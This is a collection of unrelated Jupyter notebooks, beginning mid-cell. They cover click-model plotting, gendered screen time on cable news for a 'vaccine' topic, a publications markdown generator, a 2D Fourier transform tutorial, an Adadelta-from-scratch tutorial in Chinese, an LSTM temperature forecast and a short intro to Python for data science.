range(N_FOLDS)), 'value', float('NaN')) sat_data.reset_index(level=0, inplace=True) ax = sns.boxplot(x='model', y='value', data=sat_data, order=models, 
palette=pal) restyle(ax) ax.set_ylim([-0.8, -0.2]) ax.figure.savefig(os.path.join(FIGS, 'll_sat.pdf')) ``` ### Attention feature analysis ``` models_attention = ['CASrank', 'CASnogeom', 'CASnoclass', 'CASnod', 'CAS', ] colors2 = sns.color_palette('Set2', n_colors=3, desat=0.3) pal2 = pal.copy() pal2.update({m: c for m, c in zip(models_attention[:3], colors2)}) ``` #### Clicks ``` ax = sns.boxplot(x='model', y='value', data=d_att[d_att['metric'] == 'click'], order=models_attention, palette=pal2) restyle(ax) ax.set_aspect(8) ax.figure.savefig(os.path.join(FIGS, 'll_click_attention.pdf'), bbox_inches='tight') ``` #### Satisfaction ``` ax = sns.boxplot(x='model', y='value', data=d_att[d_att['metric'] == 'sat'], order=models_attention, palette=pal2) restyle(ax) ax.set_aspect(16) ax.figure.savefig(os.path.join(FIGS, 'll_sat_attention.pdf'), bbox_inches='tight') ``` #### Pearson ``` ax = sns.boxplot(x='model', y='value', data=d_att[d_att['metric'] == 'sat pearson'], order=models_attention, palette=pal2) restyle(ax) ax.figure.savefig(os.path.join(FIGS, 'sat_pearson_attention.pdf'), bbox_inches='tight') ``` ## Train on the whole dataset (to be used with TREC) ``` def picklable_pyclick_model(pyclick_model): return {'attr': pyclick_model.params[pyclick_model.param_names.attr], 'exam': pyclick_model.params[pyclick_model.param_names.exam]} TREC_MODELS = { # 'CAS': click_model.CAS(log_id_to_rel), # 'CAST': click_model.CAS(log_id_to_rel, use_D=False, trec_style=True), # 'CASTnoreg': click_model.CAS(log_id_to_rel, use_D=False, trec_style=True, reg_coeff=0), 'CASTnosat': click_model.CAS(log_id_to_rel, use_D=False, trec_style=True, sat_term_weight=0), 'CASTnosatnoreg': click_model.CAS(log_id_to_rel, use_D=False, trec_style=True, sat_term_weight=0, reg_coeff=0), } for name, model in TREC_MODELS.iteritems(): params = model.train(data) with open('%s.params' % name, 'w') as f: pickle.dump(params, f) ```
github_jupyter
<h1>Table of Contents<span class="tocSkip"></span></h1> <div class="toc" style="margin-top: 1em;"><ul class="toc-item"><li><span><a href="#Choose-a-Topic" data-toc-modified-id="Choose-a-Topic-1"><span class="toc-item-num">1&nbsp;&nbsp;</span>Choose a Topic</a></span></li><li><span><a href="#Analysis" data-toc-modified-id="Analysis-2"><span class="toc-item-num">2&nbsp;&nbsp;</span>Analysis</a></span><ul class="toc-item"><li><span><a href="#Compare-screen-time-across-the-entire-dataset" data-toc-modified-id="Compare-screen-time-across-the-entire-dataset-2.1"><span class="toc-item-num">2.1&nbsp;&nbsp;</span>Compare screen time across the entire dataset</a></span></li><li><span><a href="#Compare-screen-time-by-show" data-toc-modified-id="Compare-screen-time-by-show-2.2"><span class="toc-item-num">2.2&nbsp;&nbsp;</span>Compare screen time by show</a></span><ul class="toc-item"><li><span><a href="#Including-hosts" data-toc-modified-id="Including-hosts-2.2.1"><span class="toc-item-num">2.2.1&nbsp;&nbsp;</span>Including hosts</a></span></li><li><span><a href="#Excluding-hosts" data-toc-modified-id="Excluding-hosts-2.2.2"><span class="toc-item-num">2.2.2&nbsp;&nbsp;</span>Excluding hosts</a></span></li></ul></li></ul></li></ul></div> ``` from esper.prelude import * from esper.stdlib import * from esper.topics import * from esper.spark_util import * from esper.plot_util import * from esper.major_canonical_shows import MAJOR_CANONICAL_SHOWS from datetime import timedelta from collections import defaultdict import _pickle as pickle ``` # Choose a Topic ``` topic = 'vaccine' lexicon = mutual_info(topic) for word, _ in lexicon: print(word) selected_words = '\n'.join(x[0] for x in lexicon) selected_words_set = set() for line in selected_words.split('\n'): line = line.strip() if line == '' or line[0] == '#': continue selected_words_set.add(line) filtered_lexicon = [x for x in lexicon if x[0] in selected_words_set] segments = find_segments(filtered_lexicon, window_size=100, 
threshold=50, merge_overlaps=True) show_segments(segments[:100]) ``` # Analysis ``` face_genders = get_face_genders() face_genders = face_genders.where( (face_genders.in_commercial == False) & (face_genders.size_percentile >= 25) & (face_genders.gender_id != Gender.objects.get(name='U').id) ) intervals_by_video = defaultdict(list) for video_id, _, interval, _, _ in segments: intervals_by_video[video_id].append(interval) face_genders_with_topic_overlap = annotate_interval_overlap(face_genders, intervals_by_video) face_genders_with_topic_overlap = face_genders_with_topic_overlap.where( face_genders_with_topic_overlap.overlap_seconds > 0) ``` ## Compare screen time across the entire dataset ``` distinct_columns = ['face_id'] overlap_field = 'overlap_seconds' z_score = 1.96 topic_screentime_with_woman = sum_distinct_over_column( face_genders_with_topic_overlap, overlap_field, distinct_columns, probability_column='female_probability' ) print('Woman on screen: {:0.2f}h +/- {:0.02f}'.format( topic_screentime_with_woman[0] / 3600, z_score * math.sqrt(topic_screentime_with_woman[1]) / 3600)) topic_screentime_with_man = sum_distinct_over_column( face_genders_with_topic_overlap, overlap_field, distinct_columns, probability_column='male_probability' ) print('Man on screen: {:0.2f}h +/- {:0.02f}'.format( topic_screentime_with_man[0] / 3600, z_score * math.sqrt(topic_screentime_with_man[1]) / 3600)) topic_screentime_with_nh_woman = sum_distinct_over_column( face_genders_with_topic_overlap.where((face_genders_with_topic_overlap.host_probability <= 0.5)), overlap_field, distinct_columns, probability_column='female_probability' ) print('Woman (non-host) on screen: {:0.2f}h +/- {:0.02f}'.format( topic_screentime_with_nh_woman[0] / 3600, z_score * math.sqrt(topic_screentime_with_nh_woman[1]) / 3600)) topic_screentime_with_nh_man = sum_distinct_over_column( face_genders_with_topic_overlap.where((face_genders_with_topic_overlap.host_probability <= 0.5)), overlap_field, 
distinct_columns, probability_column='male_probability' ) print('Man (non-host) on screen: {:0.2f}h +/- {:0.02f}'.format( topic_screentime_with_nh_man[0] / 3600, z_score * math.sqrt(topic_screentime_with_nh_man[1]) / 3600)) ``` ## Compare screen time by show ``` canoncal_show_map = { c.id : c.name for c in CanonicalShow.objects.all() } distinct_columns = ['face_id'] group_by_columns = ['canonical_show_id'] overlap_field = 'overlap_seconds' channel_name_cmap = { 'CNN': 'DarkBlue', 'FOXNEWS': 'DarkRed', 'MSNBC': 'DarkGreen' } canoncal_show_cmap = { v['show__canonical_show__name'] : channel_name_cmap[v['channel__name']] for v in Video.objects.distinct( 'show__canonical_show' ).values('show__canonical_show__name', 'channel__name') } ``` ### Including hosts ``` CACHE_BASELINE_INCL_HOST_FILE = '/tmp/base_screentime_gender_incl_host_by_show.pkl' try: with open(CACHE_BASELINE_INCL_HOST_FILE, 'rb') as f: base_screentime_with_man_by_show, base_screentime_with_woman_by_show = pickle.load(f) print('[Base] loaded from cache') except: base_screentime_with_woman_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders, 'duration', distinct_columns, group_by_columns, probability_column='female_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Base] Woman on screen: done') base_screentime_with_man_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders, 'duration', distinct_columns, group_by_columns, probability_column='male_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Base] Man on screen: done') with open(CACHE_BASELINE_INCL_HOST_FILE, 'wb') as f: pickle.dump([base_screentime_with_man_by_show, base_screentime_with_woman_by_show], f) topic_screentime_with_woman_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( 
face_genders_with_topic_overlap, overlap_field, distinct_columns, group_by_columns, probability_column='female_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Topic] Woman on screen: done') topic_screentime_with_man_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders_with_topic_overlap, overlap_field, distinct_columns, group_by_columns, probability_column='male_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Topic] Man on screen: done') plot_binary_screentime_proportion_comparison( ['Male (incl-host)', 'Female (incl-host)'], [topic_screentime_with_man_by_show, topic_screentime_with_woman_by_show], 'Proportion of gendered screen time by show for topic "{}"'.format(topic), 'Show name', 'Proportion of screen time', secondary_series_names=['Baseline Male (incl-host)', 'Baseline Female (incl-host)'], secondary_data=[base_screentime_with_man_by_show, base_screentime_with_woman_by_show], subcategory_color_map=canoncal_show_cmap ) ``` ### Excluding hosts ``` CACHE_BASELINE_NO_HOST_FILE = '/tmp/base_screentime_gender_no_host_by_show.pkl' try: with open(CACHE_BASELINE_NO_HOST_FILE, 'rb') as f: base_screentime_with_nh_man_by_show, base_screentime_with_nh_woman_by_show = pickle.load(f) print('[Base] loaded from cache') except: base_screentime_with_nh_woman_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders.where(face_genders.host_probability <= 0.25), 'duration', distinct_columns, group_by_columns, probability_column='female_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Base] Woman (non-host) on screen: done') base_screentime_with_nh_man_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders.where(face_genders.host_probability <= 0.25), 'duration', 
distinct_columns, group_by_columns, probability_column='male_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Base] Man (non-host) on screen: done') with open(CACHE_BASELINE_NO_HOST_FILE, 'wb') as f: pickle.dump([base_screentime_with_nh_man_by_show, base_screentime_with_nh_woman_by_show], f) topic_screentime_with_nh_woman_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders_with_topic_overlap.where(face_genders_with_topic_overlap.host_probability <= 0.25), overlap_field, distinct_columns, group_by_columns, probability_column='female_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Topic] Woman (non-host) on screen: done') topic_screentime_with_nh_man_by_show = { canoncal_show_map[k[0]] : (timedelta(seconds=v[0]), v[1]) for k, v in sum_distinct_over_column( face_genders_with_topic_overlap.where(face_genders_with_topic_overlap.host_probability <= 0.25), overlap_field, distinct_columns, group_by_columns, probability_column='male_probability' ).items() if canoncal_show_map[k[0]] in MAJOR_CANONICAL_SHOWS } print('[Topic] Man (non-host) on screen: done') plot_binary_screentime_proportion_comparison( ['Male (non-host)', 'Female (non-host)'], [topic_screentime_with_nh_man_by_show, topic_screentime_with_nh_woman_by_show], 'Proportion of gendered screen time by show for topic "{}"'.format(topic), 'Show name', 'Proportion of screen time', secondary_series_names=['Baseline Male (non-host)', 'Baseline Female (non-host)'], secondary_data=[base_screentime_with_nh_man_by_show, base_screentime_with_nh_woman_by_show], tertiary_series_names=['Male (incl-host)', 'Female (incl-host)'], tertiary_data=[topic_screentime_with_man_by_show, topic_screentime_with_woman_by_show], subcategory_color_map=canoncal_show_cmap ) ```
github_jupyter
# Publications markdown generator for academicpages Takes a TSV of publications with metadata and converts them for use with [academicpages.github.io](academicpages.github.io). This is an interactive Jupyter notebook ([see more info here](http://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html)). The core python code is also in `publications.py`. Run either from the `markdown_generator` folder after replacing `publications.tsv` with one containing your data. TODO: Make this work with BibTex and other databases of citations, rather than Stuart's non-standard TSV format and citation style. ## Data format The TSV needs to have the following columns: pub_date, title, venue, excerpt, citation, site_url, and paper_url, with a header at the top. - `excerpt` and `paper_url` can be blank, but the others must have values. - `pub_date` must be formatted as YYYY-MM-DD. - `url_slug` will be the descriptive part of the .md file and the permalink URL for the page about the paper. The .md file will be `YYYY-MM-DD-[url_slug].md` and the permalink will be `https://[yourdomain]/publications/YYYY-MM-DD-[url_slug]` This is how the raw file looks (it doesn't look pretty, use a spreadsheet or other program to edit and create). ``` !cat publications.tsv ``` ## Import pandas We are using the very handy pandas library for dataframes. ``` import pandas as pd ``` ## Import TSV Pandas makes this easy with the read_csv function. We are using a TSV, so we specify the separator as a tab, or `\t`. I found it important to put this data in a tab-separated values format, because there are a lot of commas in this kind of data and comma-separated values can get messed up. However, you can modify the import statement, as pandas also has read_excel(), read_json(), and others. 
``` publications = pd.read_csv("publications.tsv", sep="\t", header=0) publications ``` ## Escape special characters YAML is very picky about how it takes a valid string, so we are replacing single and double quotes (and ampersands) with their HTML encoded equivilents. This makes them look not so readable in raw format, but they are parsed and rendered nicely. ``` html_escape_table = { "&": "&amp;", '"': "&quot;", "'": "&apos;" } def html_escape(text): """Produce entities within text.""" return "".join(html_escape_table.get(c,c) for c in text) ``` ## Creating the markdown files This is where the heavy lifting is done. This loops through all the rows in the TSV dataframe, then starts to concatentate a big string (```md```) that contains the markdown for each type. It does the YAML metadata first, then does the description for the individual page. ``` import os for row, item in publications.iterrows(): md_filename = str(item.pub_date) + "-" + item.url_slug + ".md" html_filename = str(item.pub_date) + "-" + item.url_slug year = item.pub_date[:4] ## YAML variables md = "---\ntitle: \"" + item.title + '"\n' md += "layout: archive" + '\n' md += """collection: publications""" md += """\npermalink: /publication/""" + html_filename if len(str(item.excerpt)) > 5: md += "\nexcerpt: '" + html_escape(item.excerpt) + "'" md += "\ndate: " + str(item.pub_date) md += "\nvenue: '" + html_escape(item.venue) + "'" # if len(str(item.paper_url)) > 5: # md += "\npaperurl: '" + item.paper_url + "'" # md += "\ncitation: '" + html_escape(item.citation) + "'" md += "\n---" ## Markdown description for individual page if len(str(item.paper_url)) > 5: # md += "\n[<span style=\"color: #c41e3a\">Download PDF here.</span>](" + item.paper_url + ")\n" md += "\n[Download PDF here.](" + item.paper_url + ")\n" if len(str(item.excerpt)) > 5: md += "\n**Abstract**: " + html_escape(item.excerpt) + "\n" # md += "\nAbstract: " + html_escape(item.description) + "\n" md += "\n**Recommended citation**: " + 
item.citation md_filename = os.path.basename(md_filename) with open("../_publications/" + md_filename, 'w') as f: f.write(md) ``` These files are in the publications directory, one directory below where we're working from. ``` !ls ../_publications/ !cat ../_publications/2009-10-01-paper-title-number-1.md ```
github_jupyter
# Bidimensional Fourier Transform The BidimensionalFourierTransform computes FFT of functions defined on bidimensional domain and return a ScalarBidimensionalFunction representing the spectrum and the frequency domain. ``` import matplotlib.pyplot as plt import numpy as np from arte.utils.discrete_fourier_transform import \ BidimensionalFourierTransform as bfft from arte.types.domainxy import DomainXY from arte.types.scalar_bidimensional_function import ScalarBidimensionalFunction ``` ### Direct transform of 2D functions In the simplest example we transform a constant function of amplitude=1 defined in the domain [-2,2), sampled on 4x4 grid. As the normalization perserve the total power we expect a spectrum centered in (0,0) with amplitude sqrt(16) ``` sz = 4 spatial_step= 1.0 ampl = 1.0 xy = DomainXY.from_shape((sz, sz), spatial_step) constant_map= ampl*np.ones(xy.shape) spatial_funct = ScalarBidimensionalFunction(constant_map, domain=xy) spectr = bfft.direct(spatial_funct) plt.imshow(abs(spectr.values)) print("Values:\n%s" % abs(spectr.values)) print("Freq X:\n%s" % spectr.xmap) print("Freq Y:\n%s" % spectr.ymap) ``` ### Inverse Transform The inverse transform return the original spatial function, as expected. 
``` inverse_spectr = bfft.inverse(spectr) print("Values:\n%s" % inverse_spectr.values) print("Freq X:\n%s" % inverse_spectr.xmap) print("Freq Y:\n%s" % inverse_spectr.ymap) ``` ### Normalization Spectra are normalized to preserve total energy ``` xy = DomainXY.from_xy_vectors(np.linspace(-2,2,4), np.linspace(-4,0,5)) spatial_map = np.random.random(xy.xmap.shape) spatial_funct = ScalarBidimensionalFunction(spatial_map, domain=xy) spectral_funct = bfft.direct(spatial_funct) print("Power of spatial funct %g" % np.linalg.norm(spatial_funct.values)) print("Power of spectral funct %g" % np.linalg.norm(spectral_funct.values)) ``` ### Non centered domain The same example as before, on a spatial domain centered in (3,2) instead of the origin ``` sz = 4 spatial_step= 1.0 ampl = 1.0 xy = DomainXY.from_shape((sz, sz), spatial_step) xy.shift(3, 2) constant_map= ampl*np.ones(xy.shape) spatial_funct = ScalarBidimensionalFunction(constant_map, domain=xy) spectr = bfft.direct(spatial_funct) plt.imshow(abs(spectr.values)) print("Spatial Domain X: %s" % xy.xcoord) print("Spatial Domain Y: %s" % xy.ycoord) print("Spectrum Map:\n%s" % abs(spectr.values)) print("Freq X: %s" % spectr.xcoord) print("Freq Y: %s" % spectr.ycoord) ``` ### Direct transform on rectangular, unevenly spaced domain In the example below the spectrum of a constant function defined on a rectangular domain with regular sampling is computed. 
With a spatial domain of (x,y)=(20,10) points sampled at dx=0.1 and dy=0.4, we expect the spectral range to have minimum frequencies $(f^{min}_x, f^{min}_y) = (5, 1.25)$ and spectral resolution $(df_x, df_y) = (0.5, 0.25)$ ``` szx, szy = (20,10) stepx, stepy= (0.1, 0.4) ampl = 1.0 xy = DomainXY.from_shape((szy, szx), (stepy, stepx)) constant_map= ampl*np.ones(xy.shape) spatial_funct = ScalarBidimensionalFunction(constant_map, domain=xy) spectr = bfft.direct(spatial_funct) plt.imshow(abs(spectr.values)) print("spatial domain X: %s" % xy.xcoord) print("spatial domain Y: %s" % xy.ycoord) print("spectral value in (0,0) should be %g" % (np.sqrt(ampl*szx*szy))) print("Check: v(%g,%g) = %g" % ( spectr.xmap[szy//2, szx//2],spectr.ymap[szy//2,szx//2],spectr.values[szy//2,szx//2].real)) freq_step_x, freq_step_y = spectr.domain.step print("Min/Max freq x should be %g. delta_freq_x should be %g" % ( 0.5/stepx, 1/(szx*stepx))) print("Check: freq x min/max/delta %g/%g/%g" % (spectr.xcoord[0], spectr.xcoord[-1], freq_step_x)) print("Min/Max freq y should be %g. 
delta_freq_x should be %g" % ( 0.5/stepy, 1/(szy*stepy))) print("Check: freq y min/max/delta %g/%g/%g" % (spectr.ycoord[0], spectr.ycoord[-1], freq_step_y)) ``` ### Units The discrete_fourier_transform module preserve units ``` from astropy import units as u szx, szy = (20,10) stepx, stepy= (0.1 * u.m, 0.4*u.kg) ampl = 1.0 * u.V xy = DomainXY.from_shape((szy, szx), (stepy, stepx)) map_in_V= ampl*np.ones(xy.shape) spatial_funct = ScalarBidimensionalFunction(map_in_V, domain=xy) spectr = bfft.direct(spatial_funct) print("Spectrum xmap unit: %s" % spectr.xmap.unit) print("Spectrum ymap unit: %s" % spectr.ymap.unit) print("Spectrum xcoord unit: %s" % spectr.xcoord.unit) print("Spectrum ycoord unit: %s" % spectr.ycoord.unit) print("Spectrum value unit: %s" % spectr.values.unit) ``` ### Transform of numpy array The class BidimensionalFourierTransform is meant to be used with ScalarBidimensionalFunction, but it provides also the two methods direct_transform and inverse_transform that can be used with numpy arrays representing the function values. The return value is a complex array, the computation of the frequency domain is demanded to the user. ``` sz = 10 constant_map = np.ones((sz, sz)) * 3.3 res = bfft.direct_transform(constant_map) res[4:7,4:7] from astropy import units as u szx, szy = (20,2) stepx, stepy= (0.1 * u.s, 1*u.kg) ampl = 1.0 * u.V period = 1 * u.s xy = DomainXY.from_shape((szy, szx), (stepy, stepx)) map_in_V= ampl*np.sin( (2*np.pi*xy.xmap/period).to(u.rad, equivalencies=u.dimensionless_angles())) spatial_f = ScalarBidimensionalFunction(map_in_V, domain=xy) spectral_f = bfft.direct(spatial_f) print(np.abs(spectral_f.values)) print(spectral_f.xcoord) print(spectral_f.ycoord) plt.figure() plt.plot(spatial_f.xmap[0,:], spatial_f.values[0,:], '.-') plt.figure() plt.plot(spectral_f.xmap[1,:], np.abs(spectral_f.values)[1,:], '.-') ```
github_jupyter
# Adadelta --- 从0开始 我们在[Adagrad](adagrad-scratch.md)里提到,由于学习率分母上的变量$\mathbf{s}$一直在累加按元素平方的梯度,每个元素的学习率在迭代过程中一直在降低或不变。所以在有些问题下,当学习率在迭代早期降得较快时且当前解依然不理想时,Adagrad在迭代后期可能较难找到一个有用的解。我们在[RMSProp](rmsprop-scratch.md)介绍了应对这一问题的一种方法:对梯度按元素平方使用指数加权移动平均而不是累加。 事实上,Adadelta也是一种应对这个问题的方法。有意思的是,它没有学习率参数。 ## Adadelta算法 Adadelta算法也像RMSProp一样,使用了一个梯度按元素平方的指数加权移动平均变量$\mathbf{s}$,并将其中每个元素初始化为0。在每次迭代中,首先计算[小批量梯度](gd-sgd-scratch.md) $\mathbf{g}$,然后对该梯度按元素平方后做指数加权移动平均并计算$\mathbf{s}$: $$\mathbf{s} := \rho \mathbf{s} + (1 - \rho) \mathbf{g} \odot \mathbf{g} $$ 然后我们计算当前需要更新的参数的变化量: $$ \mathbf{g}^\prime = \frac{\sqrt{\Delta\mathbf{x} + \epsilon}}{\sqrt{\mathbf{s} + \epsilon}} \odot \mathbf{g} $$ 其中$\epsilon$是为了维持数值稳定性而添加的常数,例如$10^{-5}$。和Adagrad一样,模型参数中每个元素都分别拥有自己的学习率。其中$\Delta\mathbf{x}$初始化为零张量,并做如下$\mathbf{g}^\prime$按元素平方的指数加权移动平均: $$\Delta\mathbf{x} := \rho \Delta\mathbf{x} + (1 - \rho) \mathbf{g}^\prime \odot \mathbf{g}^\prime $$ 同样地,最后的参数迭代步骤与小批量随机梯度下降类似。只是这里梯度前的学习率已经被调整过了: $$\mathbf{x} := \mathbf{x} - \mathbf{g}^\prime $$ ## Adadelta的实现 Adadelta的实现很简单。我们只需要把上面的数学公式翻译成代码。 ``` # Adadalta def adadelta(params, sqrs, deltas, rho, batch_size): eps_stable = 1e-5 for param, sqr, delta in zip(params, sqrs, deltas): g = param.grad / batch_size sqr[:] = rho * sqr + (1. - rho) * nd.square(g) cur_delta = nd.sqrt(delta + eps_stable) / nd.sqrt(sqr + eps_stable) * g delta[:] = rho * delta + (1. 
- rho) * cur_delta * cur_delta param[:] -= cur_delta ``` ## 实验 实验中,我们以线性回归为例。其中真实参数`w`为[2, -3.4],`b`为4.2。我们把算法中基于指数加权移动平均的变量初始化为和参数形状相同的零张量。 ``` from mxnet import ndarray as nd import mxnet as mx from mxnet import autograd from mxnet import gluon import random mx.random.seed(1) random.seed(1) # 生成数据集。 num_inputs = 2 num_examples = 1000 true_w = [2, -3.4] true_b = 4.2 X = nd.random_normal(scale=1, shape=(num_examples, num_inputs)) y = true_w[0] * X[:, 0] + true_w[1] * X[:, 1] + true_b y += .01 * nd.random_normal(scale=1, shape=y.shape) dataset = gluon.data.ArrayDataset(X, y) # 构造迭代器。 import random def data_iter(batch_size): idx = list(range(num_examples)) random.shuffle(idx) for batch_i, i in enumerate(range(0, num_examples, batch_size)): j = nd.array(idx[i: min(i + batch_size, num_examples)]) yield batch_i, X.take(j), y.take(j) # 初始化模型参数。 def init_params(): w = nd.random_normal(scale=1, shape=(num_inputs, 1)) b = nd.zeros(shape=(1,)) params = [w, b] sqrs = [] deltas = [] for param in params: param.attach_grad() # 把算法中基于指数加权移动平均的变量初始化为和参数形状相同的零张量。 sqrs.append(param.zeros_like()) deltas.append(param.zeros_like()) return params, sqrs, deltas # 线性回归模型。 def net(X, w, b): return nd.dot(X, w) + b # 损失函数。 def square_loss(yhat, y): return (yhat - y.reshape(yhat.shape)) ** 2 / 2 ``` 接下来定义训练函数。当epoch大于2时(epoch从1开始计数),学习率以自乘0.1的方式自我衰减。训练函数的period参数说明,每次采样过该数目的数据点后,记录当前目标函数值用于作图。例如,当period和batch_size都为10时,每次迭代后均会记录目标函数值。 ``` %matplotlib inline import matplotlib as mpl mpl.rcParams['figure.dpi']= 120 import matplotlib.pyplot as plt import numpy as np def train(batch_size, rho, epochs, period): assert period >= batch_size and period % batch_size == 0 [w, b], sqrs, deltas = init_params() total_loss = [np.mean(square_loss(net(X, w, b), y).asnumpy())] # 注意epoch从1开始计数。 for epoch in range(1, epochs + 1): for batch_i, data, label in data_iter(batch_size): with autograd.record(): output = net(data, w, b) loss = square_loss(output, label) loss.backward() adadelta([w, b], sqrs, deltas, 
rho, batch_size) if batch_i * batch_size % period == 0: total_loss.append(np.mean(square_loss(net(X, w, b), y).asnumpy())) print("Batch size %d, Epoch %d, loss %.4e" % (batch_size, epoch, total_loss[-1])) print('w:', np.reshape(w.asnumpy(), (1, -1)), 'b:', b.asnumpy()[0], '\n') x_axis = np.linspace(0, epochs, len(total_loss), endpoint=True) plt.semilogy(x_axis, total_loss) plt.xlabel('epoch') plt.ylabel('loss') plt.show() ``` 使用Adadelta,最终学到的参数值与真实值较接近。 ``` train(batch_size=10, rho=0.9999, epochs=3, period=10) ``` ## 结论 * Adadelta没有学习率参数。 ## 练习 * Adadelta为什么不需要设置学习率参数?它被什么代替了? **吐槽和讨论欢迎点**[这里](https://discuss.gluon.ai/t/topic/2277)
github_jupyter
# 18DCE097 Muskaan Pirani **Project title: Weather Forecast using LSTM** 1. Main aim is to reduce RMSE values for accurate predictions. 2. We have taken dataset from Kaggle to predict the temperature of a particular place. * Train RMSE: 1.39 RMSE * Test RMSE: 1.38 RMSE ``` import numpy import matplotlib.pyplot as plt from pandas import read_csv import math from keras.models import Sequential from keras.layers import Dense, Dropout, LSTM, Bidirectional, GRU from sklearn.preprocessing import MinMaxScaler from sklearn.metrics import mean_squared_error # convert an array of values into a dataset matrix def create_dataset(dataset, look_back=1): dataX, dataY = [], [] for i in range(len(dataset)-look_back-1): a = dataset[i:(i+look_back), 0] dataX.append(a) dataY.append(dataset[i + look_back, 0]) return numpy.array(dataX), numpy.array(dataY) # fix random seed for reproducibility numpy.random.seed(7) # load the dataset dataframe = read_csv('/content/farm_temperature_data.csv', usecols=[1]) dataset = dataframe.values dataset = dataset.astype('float32') dataframe.head() # normalize the dataset scaler = MinMaxScaler(feature_range=(0, 1)) dataset = scaler.fit_transform(dataset) # split into train and test sets train_size = int(len(dataset) * 0.8) test_size = len(dataset) - train_size train, test = dataset[0:train_size,:], dataset[train_size:len(dataset),:] # reshape into X=t and Y=t+1 look_back = 1 trainX, trainY = create_dataset(train, look_back) testX, testY = create_dataset(test, look_back) # reshape input to be [samples, time steps, features] trainX = numpy.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1])) testX = numpy.reshape(testX, (testX.shape[0], 1, testX.shape[1])) # create and fit the LSTM network model = Sequential() model.add(LSTM(64, input_shape=(1, look_back), return_sequences=True)) model.add(LSTM(16, input_shape=(1, look_back), return_sequences=True)) model.add(LSTM(4, input_shape=(1, look_back), return_sequences=False)) model.add(Dropout(0.2)) 
model.add(Dense(1)) # # create and fit the BiLSTM network # model = Sequential() # model.add(Bidirectional(LSTM(64, input_shape=(1, look_back), return_sequences=True))) # model.add(Bidirectional(LSTM(16, input_shape=(1, look_back), return_sequences=True))) # model.add(Bidirectional(LSTM(4, input_shape=(1, look_back), return_sequences=False))) # model.add(Dense(1)) model.compile(loss='mean_squared_error', optimizer='adam', metrics=['accuracy']) model.fit(trainX, trainY, epochs=20, batch_size=1, verbose=2) # make predictions trainPredict = model.predict(trainX) testPredict = model.predict(testX) # invert predictions trainPredict = scaler.inverse_transform(trainPredict) trainY = scaler.inverse_transform([trainY]) testPredict = scaler.inverse_transform(testPredict) testY = scaler.inverse_transform([testY]) # calculate root mean squared error trainScore = numpy.sqrt(mean_squared_error(trainY[0], trainPredict[:,0])) print('Train Score: %.2f RMSE' % (trainScore)) testScore = numpy.sqrt(mean_squared_error(testY[0], testPredict[:,0])) print('Test Score: %.2f RMSE' % (testScore)) # shift train predictions for plotting plt.figure(figsize=(20,10)) trainPredictPlot = numpy.empty_like(dataset) trainPredictPlot[:, :] = numpy.nan trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict # shift test predictions for plotting testPredictPlot = numpy.empty_like(dataset) testPredictPlot[:, :] = numpy.nan testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict # plot baseline and predictions plt.title("Weather Forecast") plt.xlabel("Days") plt.ylabel("Temperature (Celcius)") plt.plot(scaler.inverse_transform(dataset), label="Actual") plt.plot(trainPredictPlot, label="Prediction (Train)") plt.plot(testPredictPlot, label="Prediction (Test)") plt.legend(loc="upper right") plt.show() ```
github_jupyter
# Python and Data Science Python is an open-source, interpreted, high-level language and provides a great approach to object-oriented programming. It is one of the best languages used by data scientists for various data science projects/applications. Python provides great functionality to deal with mathematics, statistics and scientific functions. It provides great libraries to deal with data science applications. One of the main reasons why Python is widely used in the scientific and research communities is because of its ease of use and simple syntax which makes it easy to adapt for people who do not have an engineering background. It is also more suited for quick prototyping. ![](https://www.brsoftech.com/blog/wp-content/uploads/2019/11/most-in-demand-programming-languages-2020.png) # Is Python a New Language? Python was first released in 1991. It was created by Guido van Rossum as a hobby project. It was named after a comedy TV series. ![Monty Python](https://upload.wikimedia.org/wikipedia/en/c/cd/Monty_Python%27s_Flying_Circus_Title_Card.png) # Computing for Everybody As Python was becoming popular, Van Rossum submitted a funding proposal to DARPA called "Computer Programming for Everybody", in which he further defined his goals for Python: - An easy and intuitive language just as powerful as major competitors - Open source, so anyone can contribute to its development - Code that is as understandable as plain English - Suitability for everyday tasks, allowing for short development times > In 2021, Python was the second most popular language on GitHub, a social coding website, behind JavaScript and was the most popular language in the last quarter of the year. According to a programming language popularity survey it is consistently among the top 10 most mentioned languages in job postings. Furthermore, Python has been among the 10 most popular programming languages every year since 2004 according to the TIOBE Programming Community Index. 
